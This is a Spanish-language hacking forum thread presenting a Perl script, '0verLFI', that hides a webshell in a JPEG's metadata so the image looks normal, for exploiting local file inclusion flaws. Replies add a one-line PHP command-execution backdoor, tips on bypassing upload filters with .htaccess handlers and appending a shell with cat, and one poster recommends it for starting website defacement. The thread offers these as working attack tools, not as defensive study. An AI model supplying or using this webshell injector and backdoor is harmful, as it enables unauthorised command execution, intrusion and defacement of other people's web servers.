Underc0de

[In]Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: LucaSthefano en Julio 17, 2011, 07:54:53 pm

Título: LFI: Inyector de Webshells en imágenes
Publicado por: LucaSthefano en Julio 17, 2011, 07:54:53 pm
Código: (perl) You are not allowed to view links. Register or Login
####################################################
#          0verLFI v0.2 Coded by The X-C3LL        #       
####################################################
#  Se trata de una herramienta bastante sencilla   #
#  para inyectar una shell en una imagen JPEG      #
#  y que esta siga pudiendo ser visualizada        #
#  correctamente, de esta forma nadie sospecha.    #
#  Lo único que hace es meter la shell dentro      #
#  de los metadatos de la foto.                    #
####################################################
#             Gr33tz to Seth & CPH Comunity        #
####################################################
#          HTTP://0VERL0AD.BLOGSPOT.COM            #
####################################################



use Image::ExifTool;

print q(

+-----------------------------------+
   0verLFI v0.1 coded by The X-C3LL 

    Http://0verl0ad.blogspot.com 
+-----------------------------------+

);

die "[-]Usage: perl 0verLFI.pl <FILE> <IMAGE>\n" unless @ARGV == 2;

my $file = $ARGV[0];
my $jpeg = $ARGV[1];
print "[+]Image = $jpeg \n";
print "[+]Shell = $file \n";

open (HANDLE, $file);
@array = <HANDLE>;
my $string = join("\n", @array);


my $tool = Image::ExifTool->new();

$tool->ExtractInfo($jpeg);
$tool->SetNewValue("Model", $string);
$done = $tool->WriteInfo($jpeg);

Simplemente tienen que pasar la imagen a inyectar como argumento:

(http://www.imagengratis.org/images/17694530.jpg)

Como podeis comprobar, tras modificar los metadatos la imagen continúa viendose perfectamente:

(http://www.imagengratis.org/images/60769865w.jpg)

Y si lo testeamos en un entorno local vulnerable veremos que funciona:

(http://www.imagengratis.org/images/57842146.jpg)


Autor: The X-C3LL
Fuente: Foro Portal Hacker
Título: Re:LFI: Inyector de Webshells en imágenes
Publicado por: KzZiIi3l en Diciembre 06, 2011, 09:30:32 pm
Esto es lo mismo qe usar JPG-inclusion o para bypassear uploads?? osea usar Gimp ó wrjpgcom para insertar en un comentario el code PHP por ejemplo usar una misma shell como mini backdoor: <?php system($_GET['cmd']); die; ?> 
Título: Re:LFI: Inyector de Webshells en imágenes
Publicado por: incroyable en Marzo 26, 2012, 12:44:55 am
te lo recomiendo .. el mejor texto para empezar con el defacing ... saludos
Título: Re:LFI: Inyector de Webshells en imágenes
Publicado por: backconnect en Julio 04, 2012, 04:54:11 am
You are not allowed to view links. Register or Login
Esto es lo mismo qe usar JPG-inclusion o para bypassear uploads?? osea usar Gimp ó wrjpgcom para insertar en un comentario el code PHP por ejemplo usar una misma shell como mini backdoor: <?php system($_GET['cmd']); die; ?>

exactamente eso mismo es una jpg inclusion, para bypasear uploads no serviria porq lo ejecutaria como jpg. necesitarias un .htaccess con addhandler para que lo ejecutara en otra extension , el autor deberia de poner que sin un file include esto no sirve de nada.
Título: Re:LFI: Inyector de Webshells en imágenes
Publicado por: Muppet en Julio 04, 2012, 07:32:22 pm
Es lo mismo q usar Cat Shell.txt >> Image.jpg
Título: Re:LFI: Inyector de Webshells en imágenes
Publicado por: aura16 en Julio 04, 2012, 08:03:33 pm
disculpa mi ignorancia pero como le ago para meter meta-datos a una imagen ._.
o como se usa esto?

lo yamo desde un archivo externo o meto directamente el codigo en los meta-datos?